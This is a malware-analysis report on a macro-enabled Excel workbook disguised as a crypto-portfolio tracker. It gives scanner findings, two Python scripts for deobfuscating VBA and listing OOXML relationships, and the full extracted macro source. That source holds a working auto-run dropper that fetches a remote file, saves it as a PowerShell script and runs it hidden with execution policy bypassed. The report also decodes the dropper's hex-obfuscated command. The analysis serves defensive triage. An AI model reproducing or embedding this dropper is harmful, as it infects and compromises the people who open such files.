Verdict: MALICIOUS
Risk score: 486
Heuristics: 12
- ClamAV: Xls.Malware.Sload-7135989-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
- VBA project inside OOXML (medium, OOXML_VBA, 8 related findings)
  Document contains a VBA project: VBA macros are present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Matched line in script:
  x = Shell(obhizpjuvuly("636d64202f6320504f5745525348454c4c2e657865") & obhizpjuvuly("202d772068696464656e202d457865637574696f6e506f6c6963792042797061737320") & _
  The two hex arguments decode to "cmd /c POWERSHELL.exe" and " -w hidden -ExecutionPolicy Bypass "; the continuation line appends the quoted path of the dropped .ps1, so the launched command is a hidden PowerShell run of that file with the execution policy bypassed.
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL)
  VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  Matched line in script: the same Shell(...) line as in the previous finding. In this sample the URL is not part of the Shell command text itself; it is fetched earlier in the same procedure (myURL), and the Shell command runs the file that response was saved to.
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC)
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script:
  xucioziiukvsse.Write WinHttpReq.responseBody
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Set itcbapxngakb = CreateObject(obhizpjuvuly("4d53584d4c322e53657276") & obhizpjuvuly("6572584d4c485454502e362e30"))
  The two hex arguments decode to "MSXML2.Serv" and "erXMLHTTP.6.0", i.e. the ProgID MSXML2.ServerXMLHTTP.6.0. The decoder obhizpjuvuly is a plain two-hex-digits-per-character Chr$(Val("&H" & pair)) loop (see the macro preview below). Note that this sample also carries unobfuscated copies of the same values right after the obfuscated ones (myURL = "https://long.af/FactDownParty" and CreateObject("MSXML2.ServerXMLHTTP.6.0")), so the decoder hides nothing here; only the Shell command exists solely in hex form.
- CreateObject call (high, OLE_VBA_CREATEOBJ)
  Matched line in script: the same CreateObject(...) line as in the previous finding.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The rule reports the matched tokens in its detail line. For this sample the decoded source (macros.bas below) contains Workbook_Open together with Shell, CreateObject, WinHttp, XMLHTTP and ADODB.Stream.
- Workbook_Open macro (low, OLE_VBA_WBOPEN)
  Matched line in script:
  Private Sub Workbook_Open()
  The macro preview also shows Workbook_BeforeSave calling the same dropper procedure, so saving the workbook is a second trigger besides opening it.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
  Matched line in script:
  xucioziiukvsse.SaveToFile Environ("USERPROFILE") + "\Documents\easrtagyhdjkdgatareraty.ps1", 2
  The file is written under %USERPROFILE%\Documents and later launched via %HOMEDRIVE%\%HOMEPATH%\Documents, which normally resolve to the same directory.
- External hyperlinks (444) (low, OOXML_EXTERNAL_HYPERLINKS)
  Document contains 444 external hyperlinks; clickable URLs are stored as external relationships. First target: http://www.floatrates.com/currency/usd/
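The decoder these findings describe is short: obhizpjuvuly walks its argument two hex digits at a time and emits Chr$(Val("&H" & pair)). The script below is an added worked example for this report, not analyzer or oletools code. It locates any such decoder in an olevba-style macro dump, inlines the decoded literals, folds "a" & "b" concatenations (including across a `_` line continuation), pulls out the URL, ProgID and Shell command that were hidden, and then runs a re-implementation of the auto-exec/execution-token pairing rule described under OLE_VBA_PCODE_AUTOEXEC_EXEC on the source before and after decoding. The input is a constructed excerpt of the macro preview from this report, trimmed to the obfuscated lines; the function names and the heuristic implementation are the example's own.

```python
"""Inline a VBA hex-string decoder and re-scan the decoded macro source.

Added example for this report; not part of the analyzer or of oletools.
"""
import re

# Constructed input: the obfuscated lines from the macro preview in this report
# (the plaintext duplicates the real macro also carries are deliberately left out).
SAMPLE_VBA = r'''
Private Sub wremrsbuejusdjzcqb(ByVal eiaesjxyhhiftjthlgjz As Boolean, vawclglumavojw As Boolean)
myURL = obhizpjuvuly("6874") & obhizpjuvuly("7470733a2f2f6c6f6e672e61662f46616374446f776e5061727479")
Set itcbapxngakb = CreateObject(obhizpjuvuly("4d53584d4c322e53657276") & obhizpjuvuly("6572584d4c485454502e362e30"))
x = Shell(obhizpjuvuly("636d64202f6320504f5745525348454c4c2e657865") & obhizpjuvuly("202d772068696464656e202d457865637574696f6e506f6c6963792042797061737320") & _
"""%HOMEDRIVE%\%HOMEPATH%\Documents\easrtagyhdjkdgatareraty.ps1""", 0)
End Sub
Private Function obhizpjuvuly(ByVal klppwpmngefx As String) As String
Dim druzanrvabho As Long
For druzanrvabho = 1 To Len(klppwpmngefx) Step 2
obhizpjuvuly = obhizpjuvuly & Chr$(Val("&H" & Mid$(klppwpmngefx, druzanrvabho, 2)))
Next druzanrvabho
End Function
Private Sub Workbook_Open()
Call wremrsbuejusdjzcqb(True, True)
End Sub
'''

# Token lists taken from the OLE_VBA_PCODE_AUTOEXEC_EXEC rule text in this report.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")

FUNC_RE = re.compile(r"Function\s+(\w+)\s*\([^\n]*\n(.*?)End Function", re.S)
DECODER_BODY_RE = re.compile(r'Chr[W$]?\(\s*Val\(\s*"&H"')        # Chr$(Val("&H" & ...))
VBA_STR = r'"((?:[^"\n]|"")*)"'                                    # one VBA literal; "" escapes a quote
JOIN_RE = re.compile(VBA_STR + r"\s*&\s*(?:_\s*\n\s*)?" + VBA_STR)  # "a" & "b"  or  "a" & _ <newline> "b"
SHELL_RE = re.compile(r'\bShell\("((?:[^"]|"")*)"')
URL_RE = re.compile(r"https?://[^\s\"']+")


def find_hex_decoders(src):
    """Names of functions whose body is a Chr(Val("&H..")) loop."""
    return {m.group(1) for m in FUNC_RE.finditer(src) if DECODER_BODY_RE.search(m.group(2))}


def decode_hex(hexstr):
    """Mirror the VBA loop: two hex digits -> one character (latin-1 keeps every byte)."""
    if len(hexstr) % 2:                      # Val("&H6") == 6: a lone trailing digit is a low nibble
        hexstr = hexstr[:-1] + "0" + hexstr[-1]
    return bytes.fromhex(hexstr).decode("latin-1")


def inline_decoder_calls(src, names):
    """Replace name("6874") with the VBA string literal it evaluates to."""
    for name in names:
        call = re.compile(r"\b" + re.escape(name) + r'\("([0-9A-Fa-f]*)"\)')
        src = call.sub(lambda m: '"' + decode_hex(m.group(1)).replace('"', '""') + '"', src)
    return src


def join_literals(src):
    """Fold adjacent literal concatenations into one literal until nothing changes."""
    while True:
        folded = JOIN_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if folded == src:
            return src
        src = folded


def deobfuscate(src):
    return join_literals(inline_decoder_calls(src, find_hex_decoders(src)))


def extract_iocs(decoded):
    """URLs, COM ProgIDs and Shell command lines visible once literals are folded."""
    return {
        "urls": sorted(set(URL_RE.findall(decoded))),
        "progids": sorted(set(re.findall(r'CreateObject\("([^"]+)"\)', decoded))),
        "shell": [m.replace('""', '"') for m in SHELL_RE.findall(decoded)],
    }


def autoexec_exec_pairing(text):
    """The pairing rule: fires only when an auto-exec entry point AND an execution token co-occur.
    VBA identifiers are case-insensitive, so the comparison is lower-cased."""
    low = text.lower()
    auto = [t for t in AUTOEXEC_TOKENS if t.lower() in low]
    exe = [t for t in EXEC_TOKENS if t.lower() in low]
    return {"fires": bool(auto) and bool(exe), "auto": auto, "exec": exe}


if __name__ == "__main__":
    decoded = deobfuscate(SAMPLE_VBA)
    print(decoded)
    print(extract_iocs(decoded))
    print("before decoding:", autoexec_exec_pairing(SAMPLE_VBA))
    print("after decoding: ", autoexec_exec_pairing(decoded))
```

On this excerpt the pairing rule already fires before decoding (Workbook_Open with Shell and CreateObject are literal in the source); decoding adds PowerShell and XMLHTTP to the execution tokens and exposes the download URL, the ProgID and the full command line, which is what a triage note should carry.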
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.floatrates.com/currency/usd/ (Referenced by macro)
  - http://www.floatrates.com/usd/jpy/ (Referenced by macro)
  - http://www.floatrates.com/daily/usd.xml (Referenced by macro)
  - http://www.floatrates.com/usd/awg/ (Referenced by macro)
  - http://www.floatrates.com/usd/mad/ (Referenced by macro)
  - http://www.floatrates.com/usd/lkr/ (Referenced by macro)
  - http://www.floatrates.com/usd/khr/ (Referenced by macro)
  - http://www.floatrates.com/usd/xpf/ (Referenced by macro)
  - http://www.floatrates.com/usd/irr/ (Referenced by macro)
  - http://www.floatrates.com/usd/xaf/ (Referenced by macro)
  - http://www.floatrates.com/usd/egp/ (Referenced by macro)
  - http://www.floatrates.com/usd/php/ (Referenced by macro)
  - http://www.floatrates.com/usd/mvr/ (Referenced by macro)
  - http://www.floatrates.com/usd/pab/ (Referenced by macro)
  - http://www.floatrates.com/usd/xcd/ (Referenced by macro)
  - http://www.floatrates.com/usd/iqd/ (Referenced by macro)
  - http://www.floatrates.com/usd/mmk/ (Referenced by macro)
  - http://www.floatrates.com/usd/aed/ (Referenced by macro)
  - http://www.floatrates.com/usd/nio/ (Referenced by macro)
  - http://www.floatrates.com/usd/aoa/ (Referenced by macro)
  - http://www.floatrates.com/usd/crc/ (Referenced by macro)
  - http://www.floatrates.com/usd/yer/ (Referenced by macro)
  - http://www.floatrates.com/usd/twd/ (Referenced by macro)
  - http://www.floatrates.com/usd/cve/ (Referenced by macro)
  - http://www.floatrates.com/usd/clp/ (Referenced by macro)
  - http://www.floatrates.com/usd/sbd/ (Referenced by macro)
  - http://www.floatrates.com/usd/ils/ (Referenced by macro)
  - http://www.floatrates.com/usd/ang/ (Referenced by macro)
  - http://www.floatrates.com/usd/sgd/ (Referenced by macro)
  - http://www.floatrates.com/usd/afn/ (Referenced by macro)
  - http://www.floatrates.com/usd/omr/ (Referenced by macro)
  - http://www.floatrates.com/usd/sek/ (Referenced by macro)
  - http://www.floatrates.com/usd/srd/ (Referenced by macro)
  - http://www.floatrates.com/usd/qar/ (Referenced by macro)
  - http://www.floatrates.com/usd/nad/ (Referenced by macro)
  - http://www.floatrates.com/usd/dzd/ (Referenced by macro)
  - http://www.floatrates.com/usd/uah/ (Referenced by macro)
  - http://www.floatrates.com/usd/mwk/ (Referenced by macro)
  - http://www.floatrates.com/usd/bwp/ (Referenced by macro)
  - http://www.floatrates.com/usd/lak/ (Referenced by macro)
  - http://www.floatrates.com/usd/tjs/ (Referenced by macro)
  - http://www.floatrates.com/usd/dop/ (Referenced by macro)
  - http://www.floatrates.com/usd/idr/ (Referenced by macro)
  - http://www.floatrates.com/usd/ttd/ (Referenced by macro)
  - http://www.floatrates.com/usd/gtq/ (Referenced by macro)
  - http://www.floatrates.com/usd/mxn/ (Referenced by macro)
  - http://www.floatrates.com/usd/syp/ (Referenced by macro)
  - http://www.floatrates.com/usd/sar/ (Referenced by macro)
  - http://www.floatrates.com/usd/sdg/ (Referenced by macro)
  - http://www.floatrates.com/usd/pln/ (Referenced by macro)
  - +17 more URL(s) not shown in this export
  The URL the dropper routine actually fetches, https://long.af/FactDownParty, does not appear among the 50 URLs listed above; it is visible in the macro preview (macros.bas) below.
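The external-hyperlinks finding and the URL list above both come from the package's relationship parts (`_rels/*.rels` entries with `TargetMode="External"`), and the VBA project is likewise a relationship from the workbook plus a content-type override for `xl/vbaProject.bin`. The script below is an added example, not analyzer code: it builds a minimal workbook package in memory as a stand-in for the analysed file, carrying three of the hyperlink targets listed above and a dummy `xl/vbaProject.bin` (only the OLE signature bytes), and enumerates those relationships with the standard library. Function names and the package layout are the example's own assumptions; the relationship type URIs and content type are the standard OOXML/MS-Office ones.

```python
"""List external relationships and macro parts of an OOXML workbook.

Added example for this report; not analyzer code. The package is constructed in
memory and stands in for the analysed .xlsm.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
WORKSHEET_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"
VBA_REL = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"

# Constructed parts: three hyperlink targets from this report's URL list.
SHEET_RELS = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK_REL}" Target="http://www.floatrates.com/currency/usd/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{HYPERLINK_REL}" Target="http://www.floatrates.com/usd/jpy/" TargetMode="External"/>
  <Relationship Id="rId3" Type="{HYPERLINK_REL}" Target="http://www.floatrates.com/daily/usd.xml" TargetMode="External"/>
</Relationships>'''
WORKBOOK_RELS = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{WORKSHEET_REL}" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="{VBA_REL}" Target="vbaProject.bin"/>
</Relationships>'''
CONTENT_TYPES = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="{CT_NS}">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>
</Types>'''


def build_sample_workbook():
    """Minimal constructed package. vbaProject.bin holds only the OLE2 signature, not a real project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("xl/_rels/workbook.xml.rels", WORKBOOK_RELS)
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", SHEET_RELS)
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


def scan_ooxml(data):
    """Walk every .rels part; collect external targets and VBA project references."""
    z = zipfile.ZipFile(io.BytesIO(data))
    external, vba_targets = [], []
    for name in z.namelist():
        if not name.lower().endswith(".rels"):
            continue
        root = ET.fromstring(z.read(name))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            rtype = rel.get("Type", "").rsplit("/", 1)[-1]      # short name: hyperlink, oleObject, ...
            if rel.get("TargetMode") == "External":
                external.append((name, rtype, rel.get("Target")))
            if rel.get("Type") == VBA_REL:
                vba_targets.append(rel.get("Target"))
    # Check the part and its content-type override as well: a package whose rels were
    # stripped or rewritten can still carry the macro part itself.
    ctypes = ET.fromstring(z.read("[Content_Types].xml"))
    vba_override = any(o.get("ContentType") == VBA_CONTENT_TYPE
                       for o in ctypes.iter(f"{{{CT_NS}}}Override"))
    has_vba_part = any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    return {
        "external_count": len(external),
        "first_target": external[0][2] if external else None,
        "external": external,
        "vba_targets": vba_targets,
        "vba_override": vba_override,
        "has_vba_part": has_vba_part,
    }


if __name__ == "__main__":
    result = scan_ooxml(build_sample_workbook())
    print(f"external relationships: {result['external_count']}, first target: {result['first_target']}")
    for part, rtype, target in result["external"]:
        print(f"  {part}: {rtype} -> {target}")
    print("VBA project rels:", result["vba_targets"],
          "| content-type override:", result["vba_override"], "| part present:", result["has_vba_part"])
```

Run against a real file, `scan_ooxml(open(path, "rb").read())` gives the same count and first-target figure the OOXML_EXTERNAL_HYPERLINKS finding reports, and the three VBA indicators should agree with each other; a mismatch (part present but no relationship or override, or the reverse) is itself worth a look.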
Extracted artifacts (6)
Files carved from inside the sample during analysis. Each entry lists filename, kind, source, size and SHA-256.

macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 12717 bytes
  SHA-256: 46e760850a376a558841e649977eeb9e4bf7a1c8c097cc1e9f6b4b67cbde9eab
  Preview script (first 1,000 lines of the extracted script; 369 lines are shown, so the whole module set is included):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub wremrsbuejusdjzcqb(ByVal eiaesjxyhhiftjthlgjz As Boolean, vawclglumavojw As Boolean)
Dim eqgmdrzcdeda As String
myURL = obhizpjuvuly("6874") & obhizpjuvuly("7470733a2f2f6c6f6e672e61662f46616374446f776e5061727479")
myURL = "https://long.af/FactDownParty"
Dim itcbapxngakb As Object
Set itcbapxngakb = CreateObject(obhizpjuvuly("4d53584d4c322e53657276") & obhizpjuvuly("6572584d4c485454502e362e30"))
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", myURL, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
Set xucioziiukvsse = CreateObject("ADODB.Stream")
xucioziiukvsse.Open
xucioziiukvsse.Type = 1
xucioziiukvsse.Write WinHttpReq.responseBody
xucioziiukvsse.SaveToFile Environ("USERPROFILE") + "\Documents\easrtagyhdjkdgatareraty.ps1", 2
xucioziiukvsse.Close
x = Shell(obhizpjuvuly("636d64202f6320504f5745525348454c4c2e657865") & obhizpjuvuly("202d772068696464656e202d457865637574696f6e506f6c6963792042797061737320") & _
"""%HOMEDRIVE%\%HOMEPATH%\Documents\easrtagyhdjkdgatareraty.ps1""", 0)
End If
End Sub
Private Function obhizpjuvuly(ByVal klppwpmngefx As String) As String
Dim druzanrvabho As Long
For druzanrvabho = 1 To Len(klppwpmngefx) Step 2
obhizpjuvuly = obhizpjuvuly & Chr$(Val("&H" & Mid$(klppwpmngefx, druzanrvabho, 2)))
Next druzanrvabho
End Function
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Call wremrsbuejusdjzcqb(True, True)
Dim score As Integer, result As String
timesincelastsave = Worksheets("Log sheet").Range("B2")
If timesincelastsave >= 0.002 Then
'this is approximately equal to 30min. Will save additional data if the last set of data was saved less than 30min ago.
Application.ScreenUpdating = False
Worksheets("Log Sheet").Range("$B$3:$AT$5000").AutoFilter Field:=6 'remove fileter (which hides the unused parts of the portfolio history chart
'copy trading data
Worksheets("Portifolio").Range("C36:L36").Copy
Worksheets("Log Sheet").Range("B3").End(xlDown).Offset(1, 0).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'copy coin symbols (for portfolio history chart)
Worksheets("Portifolio").Range("C7:V7").Copy
Worksheets("Log Sheet").Range("B3").End(xlDown).Offset(0, 10).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'copy coin holdings (for portfolio history Chart)
Worksheets("Portifolio").Range("C31:V31").Copy
Worksheets("Log Sheet").Range("B3").End(xlDown).Offset(0, 30).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'copy time of last log
Worksheets("Log Sheet").Range("J3").End(xlDown).Copy
Worksheets("Log Sheet").Range("C2").PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'hide unused rows
Worksheets("Log Sheet").Range("$B$3:$AT$5000").AutoFilter Field:=6, Criteria1:="<>"
'fix missing equations
End If
End Sub
Private Sub Workbook_Open()
Call wremrsbuejusdjzcqb(True, True)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 6, 2, MSForms, CommandButton"
Attribute VB_Control = "CommandButton4, 5, 3, MSForms, CommandButton"
Private Sub CommandButton1_Click()
Columns("M:M").Select
Selection.Insert Shift:=xlToRight, CopyOrigin:=xlFormatFromLeftOrAbove
ActiveWindow.ScrollColumn = 1
Range("C6:C31").Select
Selection.Copy
Range("M6").Select
ActiveSheet.Paste
Range("M6").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "Add Coin Name"
Range("N1:N3").Select
Selection.Cut
Range("M1").Select
ActiveSheet.Paste
Range("M20:M28").Select
Selection.ClearContents
End Sub
Private Sub CommandButton2_Click()
' RefreshCMC Macro
Application.ScreenUpdating = False
ActiveWorkbook.Connections("Connection2").Refresh
End Sub
Private Sub CommandButton3_Click()
Application.ScreenUpdating = False
Sheets("BTC Data").Select
Application.Run "blockheight"
End Sub
Private Sub CommandButton4_Click()
' RefreshCMC Macro
Application.ScreenUpdating = False
ActiveWorkbook.Connections("Connection2").Refresh
End Sub
Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub CommandButton1_Click()
Range("A6").Select
Selection.End(xlDown).Select
Selection.EntireRow.Insert , CopyOrigin:=xlFormatFromLeftOrAbove
Range("A7:S7").Select
Selection.Copy
Range("A6").Select
Selection.End(xlDown).Offset(-1, 0).Select
ActiveSheet.Paste
Range("A6").Select
Selection.End(xlDown).Offset(-1, 1).Select
Application.CutCopyMode = False
Selection.ClearContents
Selection.Offset(0, 1).Select
Selection.ClearContents
Selection.Offset(0, 1).Select
Selection.ClearContents
Range("P6").Select
Selection.End(xlDown).Offset(0, 0).Select
ActiveCell.FormulaR1C1 = "=RC[-13]+R[-1]C"
Range("S6").Select
Selection.End(xlDown).Offset(0, 0).Select
ActiveCell.FormulaR1C1 = "=RC[-2]+R[-1]C"
Range("B34:T34").Select
End Sub
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub Refresh()
Attribute Refresh.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Refresh Macro
'
ActiveWorkbook.RefreshAll
Calculate
End Sub
Attribute VB_Name = "Module3"
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 1, MSForms, CommandButton"
Private Sub CommandButton1_Click()
ActiveWorkbook.RefreshAll
Calculate
End Sub
Private Sub CommandButton2_Click()
Application.ScreenUpdating = False
Sheets("BTC Data").Select
Application.Run "blockheight"
Sheets("Moon Math").Select
End Sub
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module4"
Sub addcoin()
Attribute addcoin.VB_ProcData.VB_Invoke_Func = " \n14"
'
' addcoin Macro
'
'
Columns("K:K").Select
Selection.Insert Shift:=xlToRight, CopyOrigin:=xlFormatFromLeftOrAbove
ActiveWindow.ScrollColumn = 1
Range("B6:B26").Select
Selection.Copy
Range("K6").Select
ActiveSheet.Paste
Range("K6").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "Add Coin Name"
Range("K7").Select
End Sub
Attribute VB_Name = "Module5"
Sub blockheight()
Attribute blockheight.VB_ProcData.VB_Invoke_Func = " \n14"
'
' blockheight Macro
'
Sheets("BTC Data").Select
ActiveWorkbook.Connections("status?q=getBlockCount").Refresh
Range("AF2").Select
Selection.TextToColumns Destination:=Range("AF2"), DataType:=xlDelimited, _
TextQualifier:=xlDoubleQuote, ConsecutiveDelimiter:=False, Tab:=True, _
Semicolon:=False, Comma:=False, Space:=False, Other:=True, OtherChar _
:="}", FieldInfo:=Array(Array(1, 1), Array(2, 1)), TrailingMinusNumbers:=True
Range("AF5").Select
Selection.Copy
Range("AF4").Select
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
Sheets("Portifolio").Select
Range("B41").Select
End Sub
Attribute VB_Name = "Module6"
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module7"
Sub Macro3()
Attribute Macro3.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro3 Macro
'
'
Range("C36:I36").Select
Selection.Copy
Sheets("Log Sheet").Select
Range("B3").Select
Selection.End(xlDown).Select
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
End Sub
Attribute VB_Name = "Module8"
Sub Macro1()
Attribute Macro1.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro1 Macro
'
'
End Sub
Attribute VB_Name = "Module9"
Sub unhide()
Attribute unhide.VB_ProcData.VB_Invoke_Func = " \n14"
'
' unhide Macro
'
'
ActiveSheet.Range("$B$359:$AT$1500").AutoFilter Field:=6, Criteria1:="<>"
ActiveSheet.Range("$B$359:$AT$1500").AutoFilter Field:=6
ActiveSheet.Range("$B$359:$AT$1500").AutoFilter Field:=6, Criteria1:="<>"
End Sub
Attribute VB_Name = "Module10"
Sub Macro2()
Attribute Macro2.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro2 Macro
'
'
Range("L1:L4").Select
Selection.ClearContents
End Sub
Sub Macro4()
Attribute Macro4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro4 Macro
'
'
Range("L1:L3").Select
Selection.Cut
Application.CutCopyMode = False
Range("M1:M3").Select
Selection.Cut
Range("L1").Select
ActiveSheet.Paste
End Sub
Attribute VB_Name = "Module11"
Sub Macro5()
Attribute Macro5.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro5 Macro
'
'
Range("M20:M28").Select
Selection.ClearContents
End Sub
Attribute VB_Name = "Module12"
Sub fixlog()
Attribute fixlog.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog Macro
'
'
Range("AZ4:DD4").Select
Selection.FillDown
End Sub
Attribute VB_Name = "Module13"
Sub fixlog3()
Attribute fixlog3.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog3 Macro
'
'
ActiveWindow.ScrollColumn = 83
ActiveWindow.ScrollColumn = 82
ActiveWindow.ScrollColumn = 81
ActiveWindow.ScrollColumn = 80
ActiveWindow.ScrollColumn = 79
ActiveWindow.ScrollColumn = 78
ActiveWindow.ScrollColumn = 77
ActiveWindow.ScrollColumn = 76
Range("CC4").Select
Selection.End(xlDown).Select
Range(Selection, Selection.End(xlToRight)).Select
Range("CC7:DD8").Select
ActiveCell.FormulaR1C1 = _
"=IF(RC12>0,(INDEX(RC12:RC51,0,(MATCH(R3C,RC12:RC51,0))+20)),#N/A)"
Range("CN7").Select
End Sub
Sub fixlog4()
Attribute fixlog4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog4 Macro
'
'
Range("CC7").Select
Range(Selection, Selection.End(xlToRight)).Select
Range("CC7:DD4975").Select
Selection.FillDown
End Sub
Attribute VB_Name = "Module14"
Sub fixlog5()
Attribute fixlog5.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog5 Macro
'
'
Range("AZ6:DD6").Select
Selection.FillDown
End Sub

vbaProject_00.bin
  Kind: vba-project
